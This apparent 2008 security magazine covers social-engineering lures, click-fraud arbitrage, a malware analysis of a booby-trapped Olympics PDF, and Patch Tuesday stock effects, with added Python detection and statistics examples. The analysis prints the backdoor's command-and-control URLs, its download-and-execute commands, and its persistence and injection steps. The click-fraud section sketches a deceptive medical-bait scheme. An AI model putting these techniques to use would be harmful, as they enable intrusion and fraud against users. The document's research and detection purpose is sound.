it." Or perhaps from a system administrator: "There is a dangerous new computer virus, and our systems are not properly patched yet to defend against it. Please install the attached program on your computer right away to help us stay secure. Do this as soon as you can."

And what would happen if someone were to open or execute the attached file? Assuming that the email would not end up in the spam folder in the first place and that the anti-virus system would not catch it, we would have an infection on a computer with access to sensitive data or to the corporate web site. What if some of that sensitive data were to make its way onto the Internet, maybe even onto the web site of the company itself? There would be a public uproar, and the stock price would suffer. Then the criminal would exercise his or her put options, cashing in on the previous bet that the stock of the company would go down in value. Doing so does nothing to make the attacker traceable, as every investor with put options would be in the same situation. Who is the criminal? Nobody would be able to tell.

BBB complaint case

BBB CASE #569822971

Complaint filed by: Michael Taylor
Complaint filed against:
Complaint status:
Category: Contract Issues
Case opened date: 2/28/2008
Case closed date:
Business Name:
Contact:
BBB Member:

*** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.***
On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the business.)
The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. 2008 BBB.org, All Rights Reserved.
<Complaint_569822971.doc>

Figure 1: The Better Business Bureau scam. The email contains an infected attachment, which the attacker hopes will be opened by the recipient.

Faking the clicks

Click fraud is another common type of online fraud. It takes advantage of the fact that when a consumer clicks on an advertisement, the advertiser pays a commission both to the web site displaying the ad and to the portal that provided the web site with the ad. Related types of fraud take advantage of advertising in which money is transferred when the consumer views a banner ad (whether or not he takes action), and other approaches in which a sale or other action is generated as a result of someone viewing an ad. The objective could be to profit from these transfers (criminals benefit when their web sites display the advertisements) or to drain the advertising budgets of competitors (when the competitors are the advertisers from whom money is transferred). Often, criminals generate traffic in an automated manner, making it appear as though real people viewed the ads. Automation can include some form of malware, such as a botnet. Another common approach is for criminals to hire people to click on selected ads; this is referred to as a click farm. We will now describe how social engineering can be used in a new kind of click fraud attack. First, we'll begin by explaining a common scenario that is not click fraud:

Scenario 1: Standard web site. Consider a legitimate web site that provides some service, and that displays advertisements which relate to this service. The contents of the ads are typically determined in an automated manner by the ad portals (for example, Google and Yahoo), which automatically review the contents of the web site and select ads on topics related to the contents. If the web site is devoted to cooking, for example, then the ads may relate to pots, pans, and coffee machines. These sites also commonly place ads that bring in traffic. Thus we would expect to see ads that use keywords such as "knife," "Calphalon," "Teflon," and similar terms. There is nothing unusual about this type of site.

Scenario 2: Using arbitrage. Consider now a second web site whose content selects ads corresponding to the keywords "find a attorney." (We do mean "a," not "an." We'll explain why soon.) The site can do this by having lots of text (whether visible or not) that repeats this phrase. At the time of writing this article, the cost for this type of strategy falls in the range of $1.07 to $7.05 per keyword. The exact price depends on the venue, the time of the day, and, of course, the competing bids for the keywords, because all keyword prices are established by auctions. Thus, if a user clicks an ad on this site, the owner of the corresponding ad would pay that amount to the portal, which in turn would transfer the amount, minus commission, to the web site that displayed the ad. Next, imagine that the site in question places an advertisement using the keyword "find an attorney." The only difference here is the article: "a" versus "an." The price range for this keyword is $0.87 to $3.82. We will assume that the web site pays $2.00 for each visitor it brings in, and receives $4.00 for each visitor who clicks an ad on the site. As long as 50 percent of the visitors who arrive via the $2.00 ad click on a $4.00 ad, the site makes a profit without providing any service. This is referred to as keyword arbitrage. It is not quite click fraud, but it's close, as we shall see.
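The break-even arithmetic behind keyword arbitrage is simple enough to put in code, and doing so also shows what an ad provider would have to look at to spot the abusive form of it. The following is an added example, my own Python rather than code from the article or from McAfee. The $2.00 and $4.00 figures are Scenario 2's, and the third constructed site record uses the $0.10 asthma and $63.42 mesothelioma prices the article quotes in Scenario 3; the site names, traffic volumes, click-through rates and screening thresholds are all constructed assumptions.

```python
"""Keyword-arbitrage economics and a simple anomaly screen.

Added example (not code from the article or from McAfee). Prices are the
ones quoted in the article; site names, traffic and click-through rates
below are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ArbitrageSite:
    name: str
    cost_in: float        # paid per visitor bought via the inbound keyword
    value_out: float      # earned per click on the ad the site displays
    ctr_out: float        # share of bought visitors who click an outbound ad
    visitors_per_day: int


def break_even_ctr(cost_in, value_out):
    """Share of bought visitors who must click an outbound ad to break even.

    Revenue per visitor is ctr * value_out and cost per visitor is cost_in,
    so the site breaks even at ctr = cost_in / value_out.
    """
    if cost_in < 0 or value_out <= 0:
        raise ValueError("cost must be non-negative and click value positive")
    return cost_in / value_out


def visitors_per_paying_click(cost_in, value_out):
    """The same break-even point in its 'one click in N visitors' form.

    A site that buys no traffic (cost_in == 0) has no break-even point, so
    the spread is reported as infinite rather than dividing by zero.
    """
    ctr = break_even_ctr(cost_in, value_out)
    return float("inf") if ctr == 0 else 1.0 / ctr


def daily_profit(site):
    """Net daily result: outbound click revenue minus the cost of bought traffic."""
    revenue = site.visitors_per_day * site.ctr_out * site.value_out
    cost = site.visitors_per_day * site.cost_in
    return revenue - cost


def screen(sites, max_spread=5.0, max_ctr=0.2):
    """Flag sites that combine a large in/out price spread with an
    implausibly high outbound click-through rate.

    Both signals are needed: a large spread alone is what every arbitrageur
    buys, and a high CTR alone can be a genuinely engaging page. The
    thresholds are assumptions for illustration. Note the limitation the
    article points out: a provider that sees only the inbound or only the
    outbound side of a site cannot compute the spread at all.
    """
    flagged = []
    for s in sites:
        spread = visitors_per_paying_click(s.cost_in, s.value_out)
        if spread > max_spread and s.ctr_out > max_ctr:
            flagged.append(s.name)
    return flagged


# Constructed records: the Scenario 2 price pair at exactly break-even, a
# content site that buys no traffic, and a bait site priced like the
# asthma/mesothelioma pair the article discusses.
SITES = [
    ArbitrageSite("find-an-attorney", 2.00, 4.00, 0.50, 200),
    ArbitrageSite("cooking-blog", 0.00, 0.80, 0.02, 5000),
    ArbitrageSite("bait-article", 0.10, 63.42, 0.50, 1000),
]

if __name__ == "__main__":
    for s in SITES:
        print(f"{s.name}: break-even CTR {break_even_ctr(s.cost_in, s.value_out):.4f}, "
              f"daily profit ${daily_profit(s):,.2f}")
    print("flagged:", screen(SITES))
```

The screen deliberately requires both a wide price spread and a high outbound click-through rate: the spread is what distinguishes arbitrage from an ordinary content site, and the click-through rate is where social engineering shows up, because bait copy is what pushes it far above what a normal page achieves.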

Scenario 3: An attack using social engineering. Now we'll see how a criminal might use social engineering and extend the arbitrage technique to make a spectacular profit. Let's assume that the criminal produces a web site that generates the keyword "mesothelioma" (a rare form of cancer caused by asbestos exposure). As we write, this is a Google keyword worth $63.42. The criminal buys traffic for the keyword "asthma" ($0.10) to bring visitors to his site. If at least one in 634 people coming to his site clicks on the mesothelioma ad, he makes a profit. But why would someone do that? Assume that the web site content is an article, apparently written by a medical doctor, asking "Did you know that 10 percent of asthma sufferers are at risk to contract mesothelioma?" Although this is not a truthful statement, it will make many people who are concerned with asthma and who are unaware of what mesothelioma is do exactly what the criminal wants: click. Will half of all visitors fall for it? With a thousand visitors per day, that means a daily profit of more than $30,000. Even with less conspicuous keywords, the criminal can still make a pretty decent profit.

What makes the three scenarios differ is the intent, and the use of social engineering. From the ad provider's perspective, these three scenarios are very similar in structure. A visitor comes in, reads content, and clicks an ad. Although it is possible to match keywords coming in and going out to find anomalies, it is also possible for criminals to use one service provider to bring traffic in and another one to carry traffic out. This strategy makes it hard to detect and stop this kind of attack, especially if it is carried out at small scale using a large number of sites.

Conclusion

Social engineering on the Internet is here to stay. We have already witnessed its effects through phishing scams, and we are starting to see how criminals use social engineering to improve the efficiency of spam and crimeware. Even more skilled applications than we currently see are just around the corner, we fear, as is the use of social engineering for other types of fraud, such as click fraud. We can design technical countermeasures with this in mind, and understanding the ways attacks are likely to occur will help improve the defenses. But we must also understand that our strategy requires better user interfaces, better procedures, stronger legislation, and improved education. The good guys still have a lot of work to do.

Dr. Markus Jakobsson is a Principal Scientist at Palo Alto Research Center. He researches phishing and countermeasures, click fraud, the human factor in security, cryptography, network security, and protocol design. He is an editor of Phishing and Countermeasures (Wiley, 2006) and co-author of Crimeware: Understanding New Attacks and Defenses (Symantec Press, 2008).
Image courtesy of PARC, photographer Brian Tramontana


A Prime Target for Social Engineering Malware


By Elodie Grandjean

Malware writers often use social engineering methods to directly infect a system or host, or to start a cascade of downloading and executing malware.
Most of us have received an email containing a malicious attachment or URL while reading about an important security update or a long-lost friend who wants to re-establish contact. Don't be fooled into thinking that email is the only attack vector for spreading malware via social engineering tricks. There are plenty of other ruses, including using popular instant messaging services. A friend's compromised system might send you a message with a URL pointing to a file and asking you to look at some pictures. The problem is that you trust the contact and are unaware that the other system is infected. In many cases, the URL points to malware. Other malware uses social engineering to steal confidential information such as login credentials, credit card numbers, and so on. These techniques are typically used in phishing attacks or server intrusions. The most common social engineering tricks malware writers use are for adult services. Here's a list of others, though it's hardly exhaustive:

• Threatening emails, mentioning jail sanctions or jury-duty procedures
• Free games and screensavers containing a Trojan, or free antispyware tools, which are often rogue programs themselves
• Big events, such as sports, extreme weather disasters, or urgent news
• Celebrity names and reports on their adventures and misbehavior
• Potentially trusted or secret relationships, such as affiliation with social networking web sites, fake friends, school classmates or relatives, and secret lovers
• Pornographic links and images
• Using a female name in the sender field
• Political agendas, including solicitations for contributions in the name of a popular candidate
• Fake emails from banks, online payment services, and other financial services, requesting a confirmation or an update of login credentials or credit card information

The list of topics is potentially limitless, and there's plenty of appeal to large groups of global users. The list also highlights the fact that social engineering can often target national or even local groups of users. For example, a global attack referencing a popular social networking web site may bring responses from around the world to the malware author; on the other hand, a similar attack on the U.S. presidential election will likely ensnare only American victims.


Why Pick on the Olympics?


China has been in the spotlight for months due to the 2008 Olympic Games in Beijing. Media interest has been huge, covering athletes, fans, infrastructure, environment, and politics, among other topics. On the political front, protests over the status of Tibet have been a highly sensitive topic; many Free Tibet organizations around the world have benefited from the Olympics spotlight. Other issues, regarding slave labor and human rights, have also raised their profile. And many Internet users are interested enough to read news and other stories online. The Olympic torch became a hot symbol for protesters in the run-up to the Games. The torch's travel around the world created huge media coverage and developed even more interest and involvement among both fans and opponents. This growing interest also increased the size of the potential attack area that malware writers could exploit.


Sampling Victims
A social engineering attack usually needs to sample its victims beforehand in order to succeed. Let's see who the potential victims are of an attack using the China-Tibet conflict or the Olympic Games as a lure. We've already seen individuals from pro-Tibet groups receive emails containing a CHM (compiled HTML help file), PDF, PPT, XLS, or DOC attachment related to the Tibet situation, China in general, or the Olympics. All of these emails appeared to have been sent from a trusted organization or person. It's likely these users were accustomed to receiving such documents from their supporters and were perhaps not very vigilant. These particular attachments were malicious: they used various Microsoft Compiled HTML Help, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint, or Microsoft Word vulnerabilities to drop and silently execute embedded executable files. At this point the targeted attack area was relatively small, but the media coverage of Tibet protests helped to ignite the fuse. Later we witnessed some legitimate web sites devoted to supporting Tibet being hacked to embed the Fribet Trojan,1 which can download itself onto visitors' machines by exploiting vulnerabilities in web browsers.

At this point, the victim base increased from targeted organizations and their supporters to anyone curious about conditions in Tibet. Again, media attention aided this growth in the vulnerable population. Next, malware writers took advantage of the Olympic Games themselves to propagate social engineering attacks with the appearance of the pro-Tibet rootkit.2 This malicious set of files operated under cover of a movie file ridiculing the efforts of a Chinese gymnast; while the cartoon runs, several malicious files silently drop and a rootkit is installed on the victim's computer to hide them. Using the Olympic Games as the social engineering focus allowed the malware authors to target many sports enthusiasts, as well as all the previously targeted people who were interested in the Tibet-China conflict.


Case study: An Olympics Malware Attack


We recently received the PDF file declaration_olympic_games_eng.pdf, which was initially emailed to a pro-Tibet group. (See Figure 1.) This document seemed innocent because when the application opened, this text appeared and nothing crashed or immediately went awry. Thus, most people did not suspect any malicious activity. However, in the background, some malicious files were silently created on the victims' machines. Let's see exactly how the attack works. In fact, declaration_olympic_games_eng.pdf is an empty PDF file that exploits a vulnerability in Acrobat to drop and execute the first part of the malicious package. This malicious executable file (detected as BackDoor-DOW3) is embedded in encrypted form at the location shown in the hex editor in Figure 2. Figure 3 shows the first bytes of the embedded file once decrypted. This executable file drops the legitimate PDF file book.pdf, which is displayed when we execute the first file. The dropper file looks for the process AcroRd32.exe in the list of active processes, finds the directory where Acrobat is installed, and then opens book.pdf. Figure 4 shows the code in the dropper file that is responsible for this action.

The malware also drops another executable file, book.exe, which copies itself under %ALLUSERSPROFILE%\Application Data\msmsgs.exe and creates a new Windows service.4 This new service goes by the service and display name "Logical Disk Manager Service" and ensures that Windows will automatically run the Trojan at start-up. The malware even has a Plan B for hooking the startup process: if it fails to create the service, it will add a new registry entry, "Windows Media Player," which points to msmsgs.exe. "Windows Media Player" is added to the following start-up key in the Windows registry5: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The Trojan also creates two files containing some encrypted data:

C:\WINDOWS\jwiev.log.bak
C:\WINDOWS\clocks.avi.bak

Sponsor's declaration of responsibility at the 2008 Beijing Olympic Games

WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares:
We reaffirm our commitment to the harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity, as set forth in the Olympic Charter, and
We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and
We are fully aware of the assurance made by the government of the People's Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwide concerns expressed about China's human rights record.
IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by:
FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and
SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and
THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and
FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencement of the 2008 Olympic Games in Beijing, and
FIFTH, incorporating this Declaration of Responsibility into our commercial messages.
DECLARED BY
Name/Title Date

Figure 1: Pro-Tibet supporters recently received this apparently legitimate file as an email attachment.


Finally, book.exe cleans up by creating a batch file that deletes itself and self-terminates. From that point, the baton is passed to msmsgs.exe to take over. Msmsgs.exe temporarily drops another file at the following location: C:\Program Files\WindowsUpdate\Windows Installer.exe. Just before being deleted, Windows Installer.exe drops two copies of a DLL file into:

C:\Documents and Settings\All Users\DRM\drmv021.lic
C:\Documents and Settings\All Users\DRM\avp01.lic

The malware injects itself into svchost.exe to hide its activity. It launches a new instance of svchost.exe (the legitimate system process6), allocates a block of memory within the address space of this new process, writes a copy of itself into the virtual address space of svchost.exe (at the address 0x400000), and runs the malicious code by creating a remote thread.

The malicious code injected into svchost.exe calls the workFunc() function from avp01.lic, which connects to a remote server and sends three requests:

http://www1.palms[removed]/ld/v2/loginv2.asp?hi=2wsdf351&x=0720080510150323662070000000&y=192.168.1.122&t1=ne
http://www1.palms[removed]/ld/v2/votev2.asp?a=7351ws2&s=0720080510150323662070000000&t1=ne
http://www1.palms[removed]/ld/v2/logoutv2.asp?p=s9wlf1&s=0720080510150323662070000000&t1=ne

The x and y parameters may differ. The value of x is formed by concatenating "07" with the exact date (2008/05/10) and time (15:03:23) at which the file clocks.avi.bak was created, and then ending with the hard-coded string 662070000000. The value of y is the IP address of the victim's computer.

Figure 2: This malicious PDF carried an encrypted copy of the malware BackDoor-DOW. Figure 4: The malware looks for Acrobat Reader (AcroRd32.exe) and then opens the innocent file book.pdf.

Figure 3: The unencrypted version of BackDoor-DOW.

Fall 2008

19

Rogue Software and Sites

Creative hooks for social engineering attacks are not limited to sporting events. For several months, we have noticed an increase in malicious software posing as applications from security vendors. These programs lure victims into infecting their computers by appearing to be helpful. Several variants of the FakeAlert7 Trojan warn their victims that their machines are infected (don't you love the irony!) and provide information (often malicious URLs) for retrieving anti-spyware tools, which are in fact rogue applications themselves. Given the importance of keeping your software current, it wasn't long before rogue update web sites began to imitate the real Windows Update site. We recently discovered a sophisticated method using DLL components, linked to a fake Windows Update site, that prevented Internet Explorer from warning users when a remote web server used an invalid certificate for a secure (HTTPS) web site. The purpose of this attack was to disguise malicious files as real Windows updates that victims would download and execute. This malware trend may spread in the upcoming months. It is a serious concern because most people trust security vendors; if that trust were lost, many users would be even more likely to suffer.

The three server-side scripts loginv2.asp, votev2.asp, and logoutv2.asp respectively inform the attacker that a new compromised machine is available, check whether a command has been sent by the attacker, and stop the backdoor. To read the response sent after connecting to one of the server-side scripts, the Trojan creates a copy of the returned web page in the following folder: C:\Program Files\InstallShield Installation Information\ The filename consists of a six-digit random value and, once read, the file is deleted. loginv2.asp and logoutv2.asp return only blank web pages (with <html><head></head></html> tags), but votev2.asp returns either code that roughly means "The backdoor is ready but there is no action needed at the moment" (@n4@300@) or a command such as one of the following:

@n11@http://www1.palms[removed]/ld/v2/sy64.jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d302f7a58aeb1@
@n11@http://www1.palms[removed]/ld/v2/200764.jpg@%SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94ffd48c@

Either command roughly means "download the aforementioned file with the .jpg extension and drop it in the %SysDir% folder on the victim's machine using the provided executable filename." The last part of the response is the MD5 hash of the file that is going to be downloaded (it is used to check the file's integrity). During this entire process, victims are none the wiser about what is happening in the background. While they read and fill in the declaration that has been dropped by the malicious PDF file, the backdoor is silently installed on their computers, waiting for commands from the attacker. At this point, any other malicious file can be downloaded to the machine as well, as it is fully compromised.
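For an analyst or detection engineer, the check-in URLs and the votev2.asp reply format described in this case study are enough to write a decoder. The following is an added example (not code from McAfee Avert Labs or from the malware) that flags check-in requests in proxy log lines, recovers the dropper creation time hidden in the x/s parameter, and decodes the idle and download replies. The log format, the host name www1.c2.example.invalid and the client addresses are constructed for the example; the parameter names, script names, the x-value layout and the @-delimited reply format are the ones the article reports.

```python
"""Decoder for the BackDoor-DOW check-in and command format described in the case study."""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# The three server-side scripts named in the article, mapped to what each one does.
C2_SCRIPTS = {"loginv2.asp": "login", "votev2.asp": "poll", "logoutv2.asp": "logout"}
X_PREFIX, X_SUFFIX = "07", "662070000000"   # fixed parts of the x (or s) parameter


def decode_x(value):
    """x = '07' + creation time of clocks.avi.bak as YYYYMMDDHHMMSS + '662070000000'.

    Returns the embedded timestamp, or None if the value does not follow that layout.
    """
    if len(value) != 28 or not value.startswith(X_PREFIX) or not value.endswith(X_SUFFIX):
        return None
    try:
        return datetime.strptime(value[2:16], "%Y%m%d%H%M%S")
    except ValueError:
        return None


def inspect_request(url):
    """Return a finding for a URL that matches the check-in pattern, else None."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in C2_SCRIPTS or not parts.path.lower().startswith("/ld/v2/"):
        return None
    query = parse_qs(parts.query)
    # loginv2.asp carries the stamp as x; votev2.asp and logoutv2.asp carry it as s.
    stamp = query.get("x", query.get("s", [""]))[0]
    created = decode_x(stamp)
    return {
        "host": parts.hostname,
        "stage": C2_SCRIPTS[script],
        "victim_ip": query.get("y", [None])[0],          # y = victim's IP, login only
        "dropper_created": created.isoformat() if created else None,
    }


def parse_response(body):
    """Decode a votev2.asp reply: '@n4@300@' = nothing to do, '@n11@url@path@md5@' = fetch."""
    fields = body.strip().rstrip(".").strip("@").split("@")
    if fields == ["n4", "300"]:
        return {"action": "idle"}
    if len(fields) == 4 and fields[0] == "n11":
        url, drop_path, digest = fields[1:]
        if not re.fullmatch(r"[0-9a-fA-F]{32}", digest):
            raise ValueError("malformed MD5 in download command")
        return {"action": "download", "url": url, "drop_path": drop_path, "md5": digest.lower()}
    raise ValueError("unrecognised response: %r" % body)


# Constructed proxy log lines: "<time> <client> <method> <url>". The C2 host is a placeholder.
SAMPLE_LOG = """\
2008-05-10T15:04:01 10.0.0.5 GET http://www1.c2.example.invalid/ld/v2/loginv2.asp?hi=2wsdf351&x=0720080510150323662070000000&y=192.168.1.122&t1=ne
2008-05-10T15:04:02 10.0.0.5 GET http://www1.c2.example.invalid/ld/v2/votev2.asp?a=7351ws2&s=0720080510150323662070000000&t1=ne
2008-05-10T15:04:03 10.0.0.7 GET http://www.example.com/index.html
"""


def scan_proxy_log(text):
    """Return one finding per log line whose URL matches the check-in pattern."""
    findings = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 4:
            continue
        hit = inspect_request(cols[3])
        if hit:
            hit["time"], hit["client"] = cols[0], cols[1]
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
    print(parse_response("@n4@300@"))
```

The dropper creation time recovered from x is worth keeping: it tells an incident responder when the decoy was opened on that host, independently of the proxy timestamp.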


Conclusion
Sporting events are frequently used as bait for social engineering attacks. That malware developers would turn their attention to the Beijing Olympics was easy to foresee. The event offered all the ingredients for a perfect recipe: small targeted attacks grew larger in scope as the number of victims interested in the topic increased. This growth was possible due to closely related issues: concern over Tibet led to the global torch relay, which led to the Olympics themselves. The media often play an important role in increasing the popularity of an event. Their efforts lead some victims to search for further information, but they often stumble onto related but malicious web sites or, more commonly, legitimate web sites that are compromised and silently infect unsuspecting visitors. These attacks are so elaborate that the victims will probably not suspect anything. As we learned from the case study, we face threats not only from unknown senders and email attachments with an .exe extension. Legitimate document formats (Microsoft Word, Microsoft Excel, Microsoft PowerPoint, and others) can also carry malicious content. It is partly because of the naive belief that data files cannot hold malware that these attacks are so successful. Ultimately, people tend to become more aware of common tricks, which in turn forces attackers to become more creative and nefarious in their techniques to remain victorious over their victims.

Elodie Grandjean has been working as a virus researcher for McAfee Avert Labs in France since January 2005. She has more than five years of experience in reverse engineering on Windows platforms. Grandjean specializes in anti-reverse-engineering techniques, unpacking, and decryption, and has written for the French security magazine MISC: Multi-System & Internet Security Cookbook. When she is not analyzing malware or programming, Grandjean is probably browsing the Internet, unless she is attending a live concert or enjoying a Belgian beer in a pub with her friends.

ENDNOTES
1 Fribet, McAfee VIL. http://vil.nai.com/vil/content/v_144356.htm
2 "Is Malware Writing the Next Olympic Event?" McAfee Avert Labs Blog. http://www.avertlabs.com/research/blog/index.php/2008/04/14/is-malware-writing-the-next-olympic-event/
3 BackDoor-DOW, McAfee VIL. http://vil.nai.com/vil/content/v_144476.htm
4 Services, Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms685141(VS.85).aspx
5 Registry, Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms724871(VS.85).aspx
6 A description of svchost.exe in Windows XP Professional Edition, Microsoft Help and Support. http://support.microsoft.com/kb/314056/en-us
7 FakeAlert-B, McAfee VIL. http://vil.nai.com/vil/content/v_139058.htm; FakeAlert-C. http://vil.nai.com/vil/content/v_139219.htm; FakeAlert-D. http://vil.nai.com/vil/content/v_140346.htm; FakeAlert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm; FakeAlert-H. http://vil.nai.com/vil/content/v_141377.htm; FakeAlert-I. http://vil.nai.com/vil/content/v_141466.htm; FakeAlert-G. http://vil.nai.com/vil/content/v_141163.htm; FakeAlert-M. http://vil.nai.com/vil/content/v_142807.htm; FakeAlert-Q. http://vil.nai.com/vil/content/v_143088.htm; FakeAlert-R. http://vil.nai.com/vil/content/v_143102.htm; FakeAlert-S.dll. http://vil.nai.com/vil/content/v_143110.htm; FakeAlert-T. http://vil.nai.com/vil/content/v_143406.htm; Generic FakeAlert.a. http://vil.nai.com/vil/content/v_143470.htm


Vulnerabilities in the Equities Markets


By Anthony Bettini

The recent credit turmoil in the equities and derivatives markets has put significant focus on many facets of the financial industry, including regulatory control structures, ratings agencies, hedge funds, private equity, pension funds, and other market makers.
With this constant media attention, people in related fields (bioinformatics, computer science, and others) are beginning to take a closer look at financial engineering. With our background in vulnerability research, and given the media emphasis on the credit crisis, it is natural to look for vulnerabilities in the equities and derivatives markets. At the 2007 Black Hat USA conference, Matasano Security looked at the Financial Information eXchange (FIX) protocol, which forms the underpinning for the message passing between investment managers executing many trades on behalf of clients and brokers and dealers.1 2 Matasano's related research asks questions such as "What vulnerabilities may be present in the FIX protocol?" This was an interesting look at financial protocols from a security weakness standpoint. However, our article will take a different tack: we are more concerned with the financial and social engineering aspects than with the vulnerability aspect. Our research begins with the following questions:

Are social engineering events involving vulnerabilities and equities occurring today? Could there be even more such events in the future?

As this is a broad topic of study, let's begin by analyzing only vulnerabilities in Microsoft products. In the near future, we expect to complete complementary data for other software developers, as well as a comparison of the economics of patch distribution methods (for example, Microsoft's monthly release versus Oracle's quarterly release versus other vendors' as-needed release schedules).

The Hypothesis
Patch Tuesday is the second Tuesday of the month. It is the one day each month on which Microsoft releases security and functional updates for Windows and its other applications. Our hypothesis is that on Patch Tuesday there is downward pressure on the price of Microsoft stock (ticker symbol: MSFT). This pressure is likely due to reactions to news articles about the negative implications of security vulnerabilities in Microsoft software. Similarly, there is probably an uptick the following day, Wednesday, when people realize that Microsoft stock was oversold the prior day.

What are the stock price implications of Microsoft's Patch Tuesday? What about the day before Patch Tuesday? What about the day after Patch Tuesday (sometimes called "Exploit Wednesday")? What about Advance Notification Thursday? What about zero-day threats? Do investors even notice these events?

Are People Making Money from Patch Tuesday?

It would seem so. At the very least, it appears that there is a correlation between Microsoft stock price fluctuations and the Patch Tuesday release cycle. For instance, consider Figure 1.


The first row, "Full-year average," is our baseline: the average difference between Microsoft's stock price at the opening of trading and its price at the close of the day. Included as an alternative baseline is the non-event days average, which excludes events such as Advance Notification and Patch Tuesday. It would appear that when Microsoft issues an Advance Notification, on average the price has stronger-than-average downward momentum. Similarly, on an average Patch Tuesday, there is stronger-than-average downward momentum. Even more interesting is that on Exploit Wednesday (the day after Patch Tuesday), there is, on average, an uptick or net-positive close. This is probably because institutional investors or market makers feel Microsoft was oversold the day before because of the bad news and that, in reality, Microsoft's value as an investment was only negligibly affected. Note that this trend has been consistent during the past three years and continues today. Although the open-to-close figure is probably the easiest to understand, the trends can be seen in the average open-to-high (price of the day) and average open-to-low as well, although in some cases the effect is less strong. In Figure 2 we see that the average intraday high on an Advance Notification day and on a Patch Tuesday is generally lower than the average intraday high for the year. We also see that the average intraday high on the day following a Patch Tuesday is generally higher, pointing to stronger upward pressure. In Figure 3 we discover that the average intraday low on a Patch Tuesday is generally lower than the average intraday low for the full year. For an Advance Notification day, however, the results are more mixed. Also relevant is that the average intraday low on the day following a Patch Tuesday is usually higher than the full-year average, again pointing to stronger upward pressure.

Microsoft stock price change from the day's open to close

MSFT CHANGE FROM OPEN TO CLOSE                  2008      2007      2006
Full-year average                             -0.17%     0.06%     0.08%
Non-event days                                -0.20%     0.07%     0.08%
Advance Notification                          -0.43%    -0.12%    -0.08%
Patch Tuesday                                 -0.45%    -0.29%    -0.11%
Every Tuesday                                  0.16%     0.05%    -0.03%
Tuesday, but not Patch Tuesday                 0.37%     0.15%    -0.01%
Day after Patch Tuesday                        0.49%     0.21%     0.27%
Every Wednesday                               -0.18%     0.44%     0.29%
Wednesday, but not day after Patch Tuesday    -0.40%     0.51%     0.26%

Figure 1: Examining the change in Microsoft's stock price on key days shows a consistent three-year trend.

Microsoft open to intraday high

MSFT CHANGE FROM OPEN TO HIGH                   2008      2007      2006
Full-year average                              1.28%     0.97%     0.88%
Non-event days                                 1.34%     0.95%     0.88%
Advance Notification                           0.93%     1.08%     0.58%
Patch Tuesday                                  0.92%     0.98%     0.67%
Every Tuesday                                  1.35%     1.01%     0.92%
Tuesday, but not Patch Tuesday                 1.50%     1.02%     0.99%
Day after Patch Tuesday                        1.52%     1.30%     0.70%
Every Wednesday                                1.25%     1.24%     0.92%
Wednesday, but not day after Patch Tuesday     1.17%     1.23%     0.95%

Figure 2: In intraday trading, Advance Notification days and Patch Tuesdays deliver consistently lower stock price averages compared with other days of the year.

Microsoft open to intraday low

MSFT CHANGE FROM OPEN TO LOW                    2008      2007      2006
Full-year average                             -1.35%    -0.89%    -0.64%
Non-event days                                -1.39%    -0.90%    -0.64%
Advance Notification                          -1.24%    -1.24%    -0.36%
Patch Tuesday                                 -1.58%    -0.99%    -0.93%
Every Tuesday                                 -1.16%    -0.81%    -0.74%
Tuesday, but not Patch Tuesday                -1.01%    -0.76%    -0.68%
Day after Patch Tuesday                       -0.91%    -0.74%    -0.47%
Every Wednesday                               -1.39%    -0.78%    -0.51%
Wednesday, but not day after Patch Tuesday    -1.56%    -0.79%    -0.54%

Figure 3: Patch Tuesday retains its low position when compared with the average intraday low for the year.
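The figures above are built from a simple procedure: label each trading day (Patch Tuesday, the day after, the Advance Notification Thursday, or a non-event day), then average the open-to-close, open-to-high and open-to-low moves and the share volume within each label. The following is an added example of that procedure, not the author's own analysis code; the five quotes in SAMPLE are constructed, not real MSFT prices, and the Patch Tuesday calendar is derived from the "second Tuesday of the month" rule the article gives, with Advance Notification taken as the Thursday before it.

```python
"""Event-day statistics for a ticker around Microsoft's monthly patch cycle."""
import datetime as dt
from statistics import mean

PATCH_TUESDAY = "patch_tuesday"
DAY_AFTER = "day_after_patch_tuesday"     # "Exploit Wednesday"
ADVANCE = "advance_notification"           # Thursday before Patch Tuesday (assumption)
NON_EVENT = "non_event"
FULL_YEAR = "full_year"                    # every day in the data set


def second_tuesday(year, month):
    """Patch Tuesday is the second Tuesday of the month (weekday(): Monday=0, Tuesday=1)."""
    first = dt.date(year, month, 1)
    days_to_first_tuesday = (1 - first.weekday()) % 7
    return first + dt.timedelta(days=days_to_first_tuesday + 7)


def classify(day):
    """Label a trading day; accepts a date or an ISO date string."""
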